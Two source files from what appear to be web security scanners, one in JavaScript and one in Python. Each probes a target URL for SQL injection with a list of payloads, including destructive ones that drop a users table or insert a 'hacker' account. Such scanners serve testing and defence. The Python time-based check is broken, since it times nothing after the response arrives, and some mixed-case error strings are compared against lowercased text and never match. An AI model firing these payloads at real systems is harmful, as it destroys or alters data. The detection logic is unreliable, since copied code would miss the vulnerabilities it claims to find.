File: DAST/src/scanners/SQLInjectionScanner.js
// src/scanners/SQLInjectionScanner.js
const BaseScanner = require('./BaseScanner');
const axios = require('axios');

class SQLInjectionScanner extends BaseScanner {
	constructor() {
		super('SQL Injection');
	}

	async startScan(target) {
		// Basic SQL Injection payloads
		const payloads = [
			"' OR '1'='1",
			"'; DROP TABLE users; --",
			"' OR '1'='1' --",
			"' OR '1'='1' /*",
			"admin' --",
			"admin' #",
			"admin'/*",
			"' OR 1=1--",
			"\" OR 1=1--",
			"OR 1=1",
			"' OR 'a'='a",
			"' OR 1 -- -"
		];

		let results = [];

		for (let payload of payloads) {
			try {
				const response = await axios.get(`${target}?input=${payload}`);
				if (this.isVulnerable(response.data)) {
					results.push(`Vulnerable to SQL Injection with payload: ${payload}`);
				}
			} catch (error) {
				results.push(`Error testing payload ${payload}: ${error.message}`);
			}
		}

		const finalResult = results.length > 0 ? results.join('\n') : 'No SQL Injection vulnerabilities found.';
		this.logResult(finalResult);
		return finalResult;
	}

	isVulnerable(responseData) {
		// Basic heuristic to detect SQL error messages in the response
		const errorIndicators = [
			"You have an error in your SQL syntax",
			"Warning: mysql_fetch_array()",
			"Unclosed quotation mark",
			"quoted string not properly terminated"
		];

		return errorIndicators.some(indicator => responseData.includes(indicator));
	}
}

module.exports = SQLInjectionScanner;

File: dynascan/scanner/sql_injection_scanner.py
import requests
import time

# Expanded list of SQL Injection payloads based on OWASP Top 10 guidelines
SQL_PAYLOADS = [
    # Error-based SQLi
    "' OR '1'='1",  # Basic authentication bypass
    "' OR '1'='1' --", 
    "' OR '1'='1' /*",
    "' OR 1=1 --",
    "' OR 'x'='x",
    "' OR ''='",
    "' OR '1'='1' -- -",
    "' OR 1=1; --",
    "' OR '1'='1' ({",
    "' OR 1=1#", 

    # Union-based SQLi
    "' UNION SELECT NULL, NULL--",
    "' UNION SELECT 1, 'username' --",
    "' UNION SELECT username, password FROM users--",
    
    # Time-based Blind SQLi
    "'; WAITFOR DELAY '0:0:5' --",
    "'; SELECT IF(1=1, SLEEP(5), 0)--",
    "' AND SLEEP(5)--",
    "' OR SLEEP(5) --",
    
    # Boolean-based Blind SQLi
    "' AND '1'='1", 
    "' AND '1'='0",
    
    # Stacked queries
    "'; DROP TABLE users--",
    "'; INSERT INTO users (username, password) VALUES ('hacker', 'pass')--"
]

# List of expected SQL error messages to identify potential vulnerabilities
EXPECTED_SQL_ERRORS = [
    "syntax error",
    "you have an error in your sql syntax",
    "unclosed quotation mark after the character string",
    "quoted string not properly terminated",
    "mysql_fetch_array()",
    "SQL syntax",
    "Warning: mysql_fetch_assoc()",
    "Warning: mysql_fetch_array()",
    "Warning: mysql_num_rows()",
    "PDOException",
    "Microsoft OLE DB Provider for SQL Server",
    "PostgreSQL query failed"
]

# Function to handle SQL Injection Scanning
def scan_sql_injection(url, params, payloads=SQL_PAYLOADS, expected_errors=EXPECTED_SQL_ERRORS):
    vulnerabilities = []
    
    for param in params:
        for payload in payloads:
            # Inject the payload into the parameter
            test_params = {key: (payload if key == param else value) for key, value in params.items()}
            #print(f"Testing {url} with {test_params}")  # Logging for debugging
            
            try:
                # Sending the request
                response = requests.get(url, params=test_params, timeout=10)
                
                # Log the HTTP response code for further analysis
                #print(f"Response Code: {response.status_code}")
                #print(f"Response Text: {response.text[:500]}...")  # Print first 500 chars of the response
                
                # Check if response contains SQL errors
                if any(error in response.text.lower() for error in expected_errors):
                    vulnerabilities.append((param, payload, 'Error-based SQLi'))
                
                # Check for time-based SQL injection by measuring delay
                elif "sleep" in payload.lower() or "waitfor delay" in payload.lower():
                    start_time = time.time()
                    response_time = time.time() - start_time
                    if response_time > 5:  # Adjust threshold accordingly
                        vulnerabilities.append((param, payload, 'Time-based Blind SQLi'))
            
            except requests.exceptions.Timeout:
                # If a timeout occurs, assume time-based blind SQLi worked
                vulnerabilities.append((param, payload, 'Timeout - Possible Time-based Blind SQLi'))

            except Exception as e:
                print(f"Error occurred: {str(e)}")
    
    return vulnerabilities
